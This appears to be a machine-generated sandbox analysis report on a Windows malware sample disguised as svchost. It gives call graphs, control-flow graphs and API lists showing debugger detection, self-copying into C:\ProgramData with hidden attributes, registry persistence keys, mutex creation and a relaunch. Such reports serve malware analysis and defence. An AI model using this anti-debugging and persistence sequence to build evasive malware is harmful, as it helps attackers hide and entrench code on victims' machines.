calls 9315->9316 9317 410548 9316->9317 9318 40e569 9317->9318 9319 4116e9 __amsg_exit 66 API calls 9317->9319 9318->9313 9320 410317 9318->9320 9319->9318 9321 410323 ___BuildCatchObjectHelper 9320->9321 9322 410540 __getptd 66 API calls 9321->9322 9323 410328 9322->9323 9324 410356 9323->9324 9326 41033a 9323->9326 9325 4126fb __lock 66 API calls 9324->9325 9327 41035d 9325->9327 9328 410540 __getptd 66 API calls 9326->9328 9351 4102ca 9327->9351 9330 41033f 9328->9330 9333 41034d ___BuildCatchObjectHelper 9330->9333 9334 4116e9 __amsg_exit 66 API calls 9330->9334 9333->9313 9334->9333 9336 40fba2 ___BuildCatchObjectHelper 9335->9336 9337 410540 __getptd 66 API calls 9336->9337 9338 40fba7 9337->9338 9339 4126fb __lock 66 API calls 9338->9339 9340 40fbb9 9338->9340 9341 40fbd7 9339->9341 9343 40fbc7 ___BuildCatchObjectHelper 9340->9343 9345 4116e9 __amsg_exit 66 API calls 9340->9345 9342 40fc20 9341->9342 9346 40fc08 InterlockedIncrement 9341->9346 9347 40fbee InterlockedDecrement 9341->9347 9621 40fc31 9342->9621 9343->9309 9345->9343 9346->9342 9347->9346 9348 40fbf9 9347->9348 9348->9346 9349 410cbb _free 66 API calls 9348->9349 9350 40fc07 9349->9350 9350->9346 9352 4102d7 9351->9352 9353 41030c 9351->9353 9352->9353 9354 410057 ___addlocaleref 8 API calls 9352->9354 9359 410384 9353->9359 9355 4102ed 9354->9355 9355->9353 9362 4100e6 9355->9362 9620 412622 LeaveCriticalSection 9359->9620 9361 41038b 9361->9330 9363 4100f7 InterlockedDecrement 9362->9363 9364 41017a 9362->9364 9365 41010c InterlockedDecrement 9363->9365 9366 41010f 9363->9366 9364->9353 9376 41017f 9364->9376 9365->9366 9367 410119 InterlockedDecrement 9366->9367 9368 41011c 9366->9368 9367->9368 9369 410126 InterlockedDecrement 9368->9369 9370 410129 9368->9370 9369->9370 9371 410133 InterlockedDecrement 9370->9371 9373 410136 9370->9373 9371->9373 9372 41014f InterlockedDecrement 9372->9373 9373->9372 9374 41015f InterlockedDecrement 9373->9374 9375 41016a InterlockedDecrement 9373->9375 
9374->9373 9375->9364 9377 410203 9376->9377 9378 410196 9376->9378 9379 410250 9377->9379 9380 410cbb _free 66 API calls 9377->9380 9378->9377 9384 4101ca 9378->9384 9389 410cbb _free 66 API calls 9378->9389 9397 410279 9379->9397 9446 41280d 9379->9446 9382 410224 9380->9382 9386 410cbb _free 66 API calls 9382->9386 9385 4101eb 9384->9385 9392 410cbb _free 66 API calls 9384->9392 9387 410cbb _free 66 API calls 9385->9387 9391 410237 9386->9391 9394 4101f8 9387->9394 9388 4102be 9395 410cbb _free 66 API calls 9388->9395 9396 4101bf 9389->9396 9390 410cbb _free 66 API calls 9390->9397 9393 410cbb _free 66 API calls 9391->9393 9398 4101e0 9392->9398 9399 410245 9393->9399 9401 410cbb _free 66 API calls 9394->9401 9402 4102c4 9395->9402 9406 412bed 9396->9406 9397->9388 9400 410cbb 66 API calls _free 9397->9400 9434 412b84 9398->9434 9405 410cbb _free 66 API calls 9399->9405 9400->9397 9401->9377 9402->9353 9405->9379 9407 412bfe 9406->9407 9433 412ce7 9406->9433 9408 412c0f 9407->9408 9409 410cbb _free 66 API calls 9407->9409 9410 412c21 9408->9410 9411 410cbb _free 66 API calls 9408->9411 9409->9408 9412 410cbb _free 66 API calls 9410->9412 9415 412c33 9410->9415 9411->9410 9412->9415 9413 410cbb _free 66 API calls 9416 412c45 9413->9416 9414 412c57 9418 412c69 9414->9418 9419 410cbb _free 66 API calls 9414->9419 9415->9413 9415->9416 9416->9414 9417 410cbb _free 66 API calls 9416->9417 9417->9414 9420 412c7b 9418->9420 9421 410cbb _free 66 API calls 9418->9421 9419->9418 9422 412c8d 9420->9422 9423 410cbb _free 66 API calls 9420->9423 9421->9420 9424 412c9f 9422->9424 9425 410cbb _free 66 API calls 9422->9425 9423->9422 9426 412cb1 9424->9426 9427 410cbb _free 66 API calls 9424->9427 9425->9424 9428 412cc3 9426->9428 9429 410cbb _free 66 API calls 9426->9429 9427->9426 9430 412cd5 9428->9430 9431 410cbb _free 66 API calls 9428->9431 9429->9428 9432 410cbb _free 66 API calls 9430->9432 9430->9433 9431->9430 9432->9433 9433->9384 9435 412b91 9434->9435 9445 412be9 
9434->9445 9436 412ba1 9435->9436 9437 410cbb _free 66 API calls 9435->9437 9438 410cbb _free 66 API calls 9436->9438 9442 412bb3 9436->9442 9437->9436 9438->9442 9439 410cbb _free 66 API calls 9440 412bc5 9439->9440 9441 412bd7 9440->9441 9443 410cbb _free 66 API calls 9440->9443 9444 410cbb _free 66 API calls 9441->9444 9441->9445 9442->9439 9442->9440 9443->9441 9444->9445 9445->9385 9447 41281e 9446->9447 9619 41026e 9446->9619 9448 410cbb _free 66 API calls 9447->9448 9449 412826 9448->9449 9450 410cbb _free 66 API calls 9449->9450 9451 41282e 9450->9451 9452 410cbb _free 66 API calls 9451->9452 9453 412836 9452->9453 9454 410cbb _free 66 API calls 9453->9454 9455 41283e 9454->9455 9456 410cbb _free 66 API calls 9455->9456 9457 412846 9456->9457 9458 410cbb _free 66 API calls 9457->9458 9459 41284e 9458->9459 9460 410cbb _free 66 API calls 9459->9460 9461 412855 9460->9461 9462 410cbb _free 66 API calls 9461->9462 9463 41285d 9462->9463 9464 410cbb _free 66 API calls 9463->9464 9465 412865 9464->9465 9466 410cbb _free 66 API calls 9465->9466 9467 41286d 9466->9467 9468 410cbb _free 66 API calls 9467->9468 9469 412875 9468->9469 9470 410cbb _free 66 API calls 9469->9470 9471 41287d 9470->9471 9472 410cbb _free 66 API calls 9471->9472 9473 412885 9472->9473 9474 410cbb _free 66 API calls 9473->9474 9475 41288d 9474->9475 9476 410cbb _free 66 API calls 9475->9476 9477 412895 9476->9477 9478 410cbb _free 66 API calls 9477->9478 9479 41289d 9478->9479 9480 410cbb _free 66 API calls 9479->9480 9481 4128a8 9480->9481 9482 410cbb _free 66 API calls 9481->9482 9483 4128b0 9482->9483 9484 410cbb _free 66 API calls 9483->9484 9485 4128b8 9484->9485 9486 410cbb _free 66 API calls 9485->9486 9487 4128c0 9486->9487 9488 410cbb _free 66 API calls 9487->9488 9489 4128c8 9488->9489 9490 410cbb _free 66 API calls 9489->9490 9491 4128d0 9490->9491 9492 410cbb _free 66 API calls 9491->9492 9493 4128d8 9492->9493 9494 410cbb _free 66 API calls 9493->9494 9495 4128e0 9494->9495 
9496 410cbb _free 66 API calls 9495->9496 9497 4128e8 9496->9497 9498 410cbb _free 66 API calls 9497->9498 9499 4128f0 9498->9499 9500 410cbb _free 66 API calls 9499->9500 9501 4128f8 9500->9501 9502 410cbb _free 66 API calls 9501->9502 9503 412900 9502->9503 9504 410cbb _free 66 API calls 9503->9504 9505 412908 9504->9505 9506 410cbb _free 66 API calls 9505->9506 9507 412910 9506->9507 9508 410cbb _free 66 API calls 9507->9508 9509 412918 9508->9509 9510 410cbb _free 66 API calls 9509->9510 9511 412920 9510->9511 9512 410cbb _free 66 API calls 9511->9512 9513 41292e 9512->9513 9514 410cbb _free 66 API calls 9513->9514 9515 412939 9514->9515 9516 410cbb _free 66 API calls 9515->9516 9517 412944 9516->9517 9518 410cbb _free 66 API calls 9517->9518 9519 41294f 9518->9519 9520 410cbb _free 66 API calls 9519->9520 9521 41295a 9520->9521 9522 410cbb _free 66 API calls 9521->9522 9523 412965 9522->9523 9524 410cbb _free 66 API calls 9523->9524 9525 412970 9524->9525 9526 410cbb _free 66 API calls 9525->9526 9527 41297b 9526->9527 9528 410cbb _free 66 API calls 9527->9528 9529 412986 9528->9529 9530 410cbb _free 66 API calls 9529->9530 9531 412991 9530->9531 9532 410cbb _free 66 API calls 9531->9532 9533 41299c 9532->9533 9534 410cbb _free 66 API calls 9533->9534 9535 4129a7 9534->9535 9536 410cbb _free 66 API calls 9535->9536 9537 4129b2 9536->9537 9538 410cbb _free 66 API calls 9537->9538 9539 4129bd 9538->9539 9540 410cbb _free 66 API calls 9539->9540 9541 4129c8 9540->9541 9542 410cbb _free 66 API calls 9541->9542 9543 4129d3 9542->9543 9544 410cbb _free 66 API calls 9543->9544 9545 4129e1 9544->9545 9546 410cbb _free 66 API calls 9545->9546 9547 4129ec 9546->9547 9548 410cbb _free 66 API calls 9547->9548 9549 4129f7 9548->9549 9550 410cbb _free 66 API calls 9549->9550 9551 412a02 9550->9551 9552 410cbb _free 66 API calls 9551->9552 9553 412a0d 9552->9553 9554 410cbb _free 66 API calls 9553->9554 9555 412a18 9554->9555 9556 410cbb _free 66 API calls 9555->9556 9557 
412a23 9556->9557 9558 410cbb _free 66 API calls 9557->9558 9559 412a2e 9558->9559 9560 410cbb _free 66 API calls 9559->9560 9561 412a39 9560->9561 9562 410cbb _free 66 API calls 9561->9562 9563 412a44 9562->9563 9564 410cbb _free 66 API calls 9563->9564 9565 412a4f 9564->9565 9566 410cbb _free 66 API calls 9565->9566 9567 412a5a 9566->9567 9568 410cbb _free 66 API calls 9567->9568 9569 412a65 9568->9569 9570 410cbb _free 66 API calls 9569->9570 9571 412a70 9570->9571 9572 410cbb _free 66 API calls 9571->9572 9573 412a7b 9572->9573 9574 410cbb _free 66 API calls 9573->9574 9575 412a86 9574->9575 9576 410cbb _free 66 API calls 9575->9576 9577 412a94 9576->9577 9578 410cbb _free 66 API calls 9577->9578 9579 412a9f 9578->9579 9580 410cbb _free 66 API calls 9579->9580 9581 412aaa 9580->9581 9582 410cbb _free 66 API calls 9581->9582 9583 412ab5 9582->9583 9584 410cbb _free 66 API calls 9583->9584 9585 412ac0 9584->9585 9586 410cbb _free 66 API calls 9585->9586 9587 412acb 9586->9587 9588 410cbb _free 66 API calls 9587->9588 9589 412ad6 9588->9589 9590 410cbb _free 66 API calls 9589->9590 9591 412ae1 9590->9591 9592 410cbb _free 66 API calls 9591->9592 9593 412aec 9592->9593 9594 410cbb _free 66 API calls 9593->9594 9595 412af7 9594->9595 9596 410cbb _free 66 API calls 9595->9596 9597 412b02 9596->9597 9598 410cbb _free 66 API calls 9597->9598 9599 412b0d 9598->9599 9600 410cbb _free 66 API calls 9599->9600 9601 412b18 9600->9601 9602 410cbb _free 66 API calls 9601->9602 9603 412b23 9602->9603 9604 410cbb _free 66 API calls 9603->9604 9605 412b2e 9604->9605 9606 410cbb _free 66 API calls 9605->9606 9607 412b39 9606->9607 9608 410cbb _free 66 API calls 9607->9608 9609 412b47 9608->9609 9610 410cbb _free 66 API calls 9609->9610 9611 412b52 9610->9611 9612 410cbb _free 66 API calls 9611->9612 9613 412b5d 9612->9613 9614 410cbb _free 66 API calls 9613->9614 9615 412b68 9614->9615 9616 410cbb _free 66 API calls 9615->9616 9617 412b73 9616->9617 9618 410cbb _free 66 API calls 
9617->9618 9618->9619 9619->9390 9620->9361 9624 412622 LeaveCriticalSection 9621->9624 9623 40fc38 9623->9340 9624->9623 9626 40feab ___BuildCatchObjectHelper 9625->9626 9627 410540 __getptd 66 API calls 9626->9627 9628 40feb4 9627->9628 9629 40fb96 __setmbcp 68 API calls 9628->9629 9630 40febe 9629->9630 9656 40fc3a 9630->9656 9633 41272e __malloc_crt 66 API calls 9634 40fedf 9633->9634 9635 40fffe ___BuildCatchObjectHelper 9634->9635 9663 40fcb6 9634->9663 9635->9299 9638 41000b 9638->9635 9643 41001e 9638->9643 9645 410cbb _free 66 API calls 9638->9645 9639 40ff0f InterlockedDecrement 9640 40ff30 InterlockedIncrement 9639->9640 9641 40ff1f 9639->9641 9640->9635 9642 40ff46 9640->9642 9641->9640 9644 410cbb _free 66 API calls 9641->9644 9642->9635 9648 4126fb __lock 66 API calls 9642->9648 9646 410b21 __wcsicmp_l 66 API calls 9643->9646 9647 40ff2f 9644->9647 9645->9643 9646->9635 9647->9640 9650 40ff5a InterlockedDecrement 9648->9650 9651 40ffd6 9650->9651 9652 40ffe9 InterlockedIncrement 9650->9652 9651->9652 9654 410cbb _free 66 API calls 9651->9654 9673 410000 9652->9673 9655 40ffe8 9654->9655 9655->9652 9657 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 9656->9657 9658 40fc4e 9657->9658 9659 40fc77 9658->9659 9660 40fc59 GetOEMCP 9658->9660 9661 40fc7c GetACP 9659->9661 9662 40fc69 9659->9662 9660->9662 9661->9662 9662->9633 9662->9635 9664 40fc3a getSystemCP 78 API calls 9663->9664 9665 40fcd6 9664->9665 9666 40fce1 setSBCS 9665->9666 9668 40fd25 IsValidCodePage 9665->9668 9672 40fd4a _memset __setmbcp_nolock 9665->9672 9667 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9666->9667 9669 40fe9d 9667->9669 9668->9666 9670 40fd37 GetCPInfo 9668->9670 9669->9638 9669->9639 9670->9666 9670->9672 9676 40fa06 GetCPInfo 9672->9676 9737 412622 LeaveCriticalSection 9673->9737 9675 410007 9675->9635 9678 40fa3a _memset 9676->9678 9685 40faee 9676->9685 9686 412541 9678->9686 9681 40e542 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9683 40fb94 9681->9683 9683->9672 9684 41134c ___crtLCMapStringA 82 API calls 9684->9685 9685->9681 9687 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 9686->9687 9688 412554 9687->9688 9696 41245a 9688->9696 9691 41134c 9692 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 9691->9692 9693 41135f 9692->9693 9713 411165 9693->9713 9697 412483 MultiByteToWideChar 9696->9697 9698 412478 9696->9698 9701 4124b0 9697->9701 9708 4124ac 9697->9708 9698->9697 9699 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9702 40faa9 9699->9702 9700 4124c5 _memset __crtGetStringTypeA_stat 9703 4124fe MultiByteToWideChar 9700->9703 9700->9708 9701->9700 9704 410b93 _malloc 66 API calls 9701->9704 9702->9691 9705 412525 9703->9705 9706 412514 GetStringTypeW 9703->9706 9704->9700 9709 40f127 9705->9709 9706->9705 9708->9699 9710 40f144 9709->9710 9711 40f133 9709->9711 9710->9708 9711->9710 9712 410cbb _free 66 API calls 9711->9712 9712->9710 9715 411183 MultiByteToWideChar 9713->9715 9716 4111e1 9715->9716 9720 4111e8 9715->9720 9717 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9716->9717 9719 40fac9 9717->9719 9718 411235 MultiByteToWideChar 9721 41132d 9718->9721 9722 41124e LCMapStringW 9718->9722 9719->9684 9723 410b93 _malloc 66 API calls 9720->9723 9727 411201 __crtGetStringTypeA_stat 9720->9727 9725 40f127 __freea 66 API calls 9721->9725 9722->9721 9724 41126d 9722->9724 9723->9727 9726 411277 9724->9726 9730 4112a0 9724->9730 9725->9716 9726->9721 9728 41128b LCMapStringW 9726->9728 9727->9716 9727->9718 9728->9721 9729 4112ef LCMapStringW 9731 411305 WideCharToMultiByte 9729->9731 9732 411327 9729->9732 9733 4112bb __crtGetStringTypeA_stat 9730->9733 9734 410b93 _malloc 66 API calls 9730->9734 9731->9732 9735 40f127 __freea 66 API calls 9732->9735 9733->9721 9733->9729 9734->9733 9735->9721 9737->9675 9739 410b42 9738->9739 9740 410b49 9738->9740 
9739->9740 9745 410b67 9739->9745 9741 410b21 __wcsicmp_l 66 API calls 9740->9741 9742 410b4e 9741->9742 9743 410acf __wcsicmp_l 11 API calls 9742->9743 9744 410b58 9743->9744 9744->8949 9745->9744 9746 410b21 __wcsicmp_l 66 API calls 9745->9746 9746->9742 9748 4136e9 EncodePointer 9747->9748 9748->9748 9749 413703 9748->9749 9749->8963 9753 41108f 9750->9753 9752 4110d8 9752->8965 9754 41109b ___BuildCatchObjectHelper 9753->9754 9761 41145f 9754->9761 9760 4110bc ___BuildCatchObjectHelper 9760->9752 9762 4126fb __lock 66 API calls 9761->9762 9763 4110a0 9762->9763 9764 410fa8 DecodePointer DecodePointer 9763->9764 9765 411057 9764->9765 9766 410fd6 9764->9766 9775 4110c5 9765->9775 9766->9765 9778 4133c2 9766->9778 9768 41103a EncodePointer EncodePointer 9768->9765 9769 410fe8 9769->9768 9770 41100c 9769->9770 9785 4127bf 9769->9785 9770->9765 9772 4127bf __realloc_crt 70 API calls 9770->9772 9773 411028 EncodePointer 9770->9773 9774 411022 9772->9774 9773->9768 9774->9765 9774->9773 9811 411468 9775->9811 9779 4133e2 HeapSize 9778->9779 9780 4133cd 9778->9780 9779->9769 9781 410b21 __wcsicmp_l 66 API calls 9780->9781 9782 4133d2 9781->9782 9783 410acf __wcsicmp_l 11 API calls 9782->9783 9784 4133dd 9783->9784 9784->9769 9789 4127c8 9785->9789 9787 412807 9787->9770 9788 4127e8 Sleep 9788->9789 9789->9787 9789->9788 9790 413bc9 9789->9790 9791 413bd4 9790->9791 9792 413bdf 9790->9792 9793 410b93 _malloc 66 API calls 9791->9793 9794 413be7 9792->9794 9805 413bf4 9792->9805 9795 413bdc 9793->9795 9796 410cbb _free 66 API calls 9794->9796 9795->9789 9810 413bef _free 9796->9810 9797 413c2c 9798 4110f1 _malloc DecodePointer 9797->9798 9800 413c32 9798->9800 9799 413bfc HeapReAlloc 9799->9805 9799->9810 9801 410b21 __wcsicmp_l 66 API calls 9800->9801 9801->9810 9802 413c5c 9804 410b21 __wcsicmp_l 66 API calls 9802->9804 9803 4110f1 _malloc DecodePointer 9803->9805 9806 413c61 GetLastError 9804->9806 9805->9797 9805->9799 9805->9802 9805->9803 9807 413c44 9805->9807 
9806->9810 9808 410b21 __wcsicmp_l 66 API calls 9807->9808 9809 413c49 GetLastError 9808->9809 9809->9810 9810->9789 9814 412622 LeaveCriticalSection 9811->9814 9813 4110ca 9813->9760 9814->9813 9919 401000 9815->9919 9818 40112a 9820 401134 GetProcAddress 9818->9820 9819 401163 9819->8973 9819->8977 9819->8978 9820->9819 9821 40114b GetCurrentProcess NtQueryInformationProcess 9820->9821 9821->9819 9921 401090 9822->9921 9825 40de84 SetErrorMode 9931 40d440 GetSystemTime 9825->9931 9826 40de55 _wcsrchr 9826->9825 9829 40de6f SetCurrentDirectoryW 9826->9829 9829->9825 9830 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9831 40de9e GetCommandLineW CommandLineToArgvW 9830->9831 9831->8981 9831->8982 9833 40d81f _memset 9832->9833 9834 40d87e GetModuleFileNameW 9833->9834 9835 40d899 9834->9835 9838 40d8a0 _wcsrchr 9834->9838 9836 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9835->9836 9837 40de0e 9836->9837 9837->8985 9838->9835 9839 40f501 __NMSG_WRITE 66 API calls 9838->9839 9840 40d932 SHGetFolderPathW 9839->9840 9841 40d964 9840->9841 9842 40d94e 9840->9842 9959 40f5ce 9841->9959 9843 40f643 __NMSG_WRITE 66 API calls 9842->9843 9843->9841 9846 40f5ce __NMSG_WRITE 66 API calls 9847 40d998 CreateDirectoryW 9846->9847 9848 40d9c2 SetFileAttributesW 9847->9848 9849 40d9ae GetLastError 9847->9849 9850 40f5ce __NMSG_WRITE 66 API calls 9848->9850 9849->9835 9849->9848 9851 40d9e7 9850->9851 9852 40f5ce __NMSG_WRITE 66 API calls 9851->9852 9853 40da02 9852->9853 9854 40f5ce __NMSG_WRITE 66 API calls 9853->9854 9855 40da1b CopyFileW 9854->9855 9855->9835 9856 40da3f SetFileAttributesW 9855->9856 9857 40f5ce __NMSG_WRITE 66 API calls 9856->9857 9858 40da66 9857->9858 9859 40f5ce __NMSG_WRITE 66 API calls 9858->9859 9860 40da7f RegCreateKeyExW 9859->9860 9861 40db4b 9860->9861 9862 40dabd RegSetValueExW RegCloseKey 9860->9862 9863 40dc12 9861->9863 9864 40db5a RegCreateKeyExW 9861->9864 9862->9861 9872 40dc29 _wcsrchr 
9863->9872 9968 40d6d0 9863->9968 9864->9863 9865 40db84 RegSetValueExW RegCloseKey 9864->9865 9865->9863 9869 40dd85 _memset 9870 40dd99 CreateProcessW 9869->9870 9870->9835 9871 40dde4 CloseHandle CloseHandle 9870->9871 9871->9835 9872->9835 9872->9869 9872->9872 9873 40dd60 CopyFileW SetFileAttributesW 9872->9873 9873->9869 9875 40f485 9874->9875 9876 40f4ee 9874->9876 9878 410b21 __wcsicmp_l 66 API calls 9875->9878 9881 40e007 9875->9881 10002 40f373 9876->10002 9879 40f491 9878->9879 9880 410acf __wcsicmp_l 11 API calls 9879->9880 9880->9881 9881->8989 9881->8990 9883 405b35 9882->9883 9901 405b2e 9882->9901 9884 405b5e GetPEB 9883->9884 9883->9901 9886 405b88 GetPEB 9884->9886 9884->9901 9885 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9887 405e0c 9885->9887 9888 405bb6 _memset 9886->9888 9886->9901 9887->8985 9889 405bd3 GetCurrentThread GetThreadContext 9888->9889 9890 405bf8 9889->9890 9891 401090 4 API calls 9890->9891 9890->9901 9892 405c3c 9891->9892 10017 40e120 9892->10017 9895 405c5a 9897 405c67 GetModuleHandleA 9895->9897 9898 405cd2 9895->9898 9896 405c4f GetModuleHandleA 9896->9895 9899 405c81 LoadLibraryA 9897->9899 9900 405c92 GetProcAddress GetProcAddress 9897->9900 9898->9901 9904 405d41 OpenMutexA 9898->9904 9909 405d97 9898->9909 9899->9900 9902 405cc9 9900->9902 9903 405cde GetProcAddress GetProcAddress 9900->9903 9901->9885 9902->9898 9902->9903 9903->9898 9905 405d62 CloseHandle 9904->9905 9906 405d76 CreateMutexA 9904->9906 9905->9901 9906->9901 9906->9909 9907 405dd1 9907->9901 9908 405de5 CloseHandle 9907->9908 9908->9901 9909->9907 10022 4058a0 9909->10022 9912 405e4a GetPEB 9911->9912 9918 405e45 9911->9918 9913 405e76 GetPEB 9912->9913 9912->9918 9915 405e9e _memset 9913->9915 9913->9918 9914 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9916 405f41 9914->9916 9917 405ebb GetCurrentThread GetThreadContext 9915->9917 9916->8985 9917->9918 9918->9914 9920 40100f 
GetModuleHandleA 9919->9920 9920->9818 9920->9819 9922 401000 9921->9922 9923 4010a0 GetModuleHandleA 9922->9923 9924 4010b3 9923->9924 9925 4010f8 GetModuleFileNameW 9923->9925 9926 4010bd GetProcAddress 9924->9926 9925->9825 9925->9826 9926->9925 9927 4010d4 9926->9927 9928 4010e2 GetCurrentThread 9927->9928 9929 4010da 9927->9929 9930 4010eb NtSetInformationThread 9928->9930 9929->9930 9930->9925 9936 40d140 9931->9936 9933 40d469 9934 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9933->9934 9935 40d484 9934->9935 9935->9830 9937 40d15f 9936->9937 9944 40d1f0 9937->9944 9939 40d176 9950 40d2f0 9939->9950 9942 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9943 40d196 9942->9943 9943->9933 9945 40d20c 9944->9945 9949 40d24c 9945->9949 9954 40cd20 9945->9954 9947 40d28d 9948 40cd20 5 API calls 9947->9948 9948->9949 9949->9939 9951 40d350 _memset 9950->9951 9952 40cd20 5 API calls 9951->9952 9953 40d189 9952->9953 9953->9942 9958 40cd4f 9954->9958 9955 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9956 40d12e 9955->9956 9956->9947 9957 40cf66 9957->9947 9958->9955 9958->9957 9960 40f5e3 9959->9960 9962 40f5dc 9959->9962 9961 410b21 __wcsicmp_l 66 API calls 9960->9961 9967 40f5e8 9961->9967 9962->9960 9965 40f618 9962->9965 9963 410acf __wcsicmp_l 11 API calls 9964 40d97d 9963->9964 9964->9846 9965->9964 9966 410b21 __wcsicmp_l 66 API calls 9965->9966 9966->9967 9967->9963 9974 40d727 _memset 9968->9974 9969 40d73a 9970 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9969->9970 9971 40d7eb 9970->9971 9971->9872 9972 40d765 SHGetFolderPathW 9972->9974 9974->9969 9974->9972 9975 40f5ce __NMSG_WRITE 66 API calls 9974->9975 9977 40e340 9974->9977 9986 40d490 9974->9986 9975->9974 9984 40e376 _memset _wcschr 9977->9984 9978 40e389 9979 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9978->9979 9980 40e4a4 9979->9980 9980->9974 9981 40f643 

                                      Control-flow Graph

                                      control_flow_graph 0 40d7f0-40d897 call 4123e0 * 4 GetModuleFileNameW 9 40d8a0-40d8be call 40eedb 0->9 10 40d899-40d89b 0->10 16 40d8c0-40d8c2 9->16 17 40d8c7-40d8f4 call 40eedb 9->17 11 40de04-40de11 call 40e542 10->11 16->11 20 40d904-40d906 17->20 21 40d8f6-40d902 17->21 20->11 21->20 22 40d90b-40d94c call 40f501 SHGetFolderPathW 21->22 25 40d967-40d9ac call 40f5ce * 2 CreateDirectoryW 22->25 26 40d94e-40d964 call 40f643 22->26 33 40d9c2-40da36 SetFileAttributesW call 40f5ce * 3 CopyFileW 25->33 34 40d9ae-40d9b9 GetLastError 25->34 26->25 42 40da38-40da3a 33->42 43 40da3f-40dab7 SetFileAttributesW call 40f5ce * 2 RegCreateKeyExW 33->43 34->33 36 40d9bb-40d9bd 34->36 36->11 42->11 48 40db4b-40db54 43->48 49 40dabd-40dad2 43->49 50 40dc12-40dc1b 48->50 51 40db5a-40db7e RegCreateKeyExW 48->51 52 40dad8-40daf7 49->52 54 40dc32-40dc3b 50->54 55 40dc1d-40dc2c call 40d6d0 50->55 51->50 53 40db84-40db99 51->53 52->52 56 40daf9-40db45 RegSetValueExW RegCloseKey 52->56 57 40db9f-40dbbe 53->57 59 40dc44-40dc62 call 40eedb 54->59 60 40dc3d-40dc3f 54->60 55->54 56->48 57->57 61 40dbc0-40dc0c RegSetValueExW RegCloseKey 57->61 65 40dd85-40dde2 call 4123e0 CreateProcessW 59->65 66 40dc68-40dc86 call 40eedb 59->66 60->11 61->50 72 40de02 65->72 73 40dde4-40de00 CloseHandle * 2 65->73 66->65 71 40dc8c-40dca8 66->71 74 40dcae-40dcf4 71->74 72->11 73->11 74->74 75 40dcf6-40dd12 74->75 76 40dd18-40dd5e 75->76 76->76 77 40dd60-40dd7f CopyFileW SetFileAttributesW 76->77 77->65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset$FileModuleName_wcsrchr
                                      • String ID: " --run$.exe$C:\ProgramData$D
                                      • API String ID: 4110263760-856358560
                                      • Opcode ID: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction ID: 5e5d0b140630b177179d526cbad5a59638b82476de5506c4c87b912bd79cfa18
                                      • Opcode Fuzzy Hash: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction Fuzzy Hash: 80F15271E443189BDB20DF60CC45BEAB774AF49704F0081E9E20DB6681EBB55AD8CF5A

                                      Control-flow Graph

                                      control_flow_graph 78 40deb0-40def2 IsDebuggerPresent 79 40def4-40df05 78->79 80 40df0a-40df14 call 401100 78->80 81 40e108-40e119 79->81 84 40df16-40df27 80->84 85 40df2c-40df43 80->85 84->81 86 40dfb0-40dfda call 40de20 GetCommandLineW CommandLineToArgvW 85->86 87 40df45-40df61 GetPEB 85->87 92 40dfe2 call 40d7f0 86->92 93 40dfdc-40dfe0 86->93 88 40df63-40df74 87->88 89 40df79-40df92 87->89 88->81 89->81 96 40dfe7 92->96 93->92 95 40dfec-40dff0 93->95 97 40dff6-40e00c call 40f476 95->97 98 40e0ab-40e0af 95->98 96->98 103 40e04e-40e064 call 40f476 97->103 104 40e00e-40e019 97->104 100 40e0b1-40e0b5 LocalFree 98->100 101 40e0bb-40e0d3 98->101 100->101 101->81 111 40e0a6 call 40d7f0 103->111 112 40e066-40e071 103->112 105 40e01b-40e031 call 40f476 104->105 106 40e03c-40e04c call 405b10 104->106 105->106 118 40e033-40e039 105->118 106->98 111->98 115 40e073-40e089 call 40f476 112->115 116 40e094-40e0a4 call 405e10 112->116 115->116 123 40e08b-40e091 115->123 116->98 118->106 123->116
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(C3108867), ref: 0040DEEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
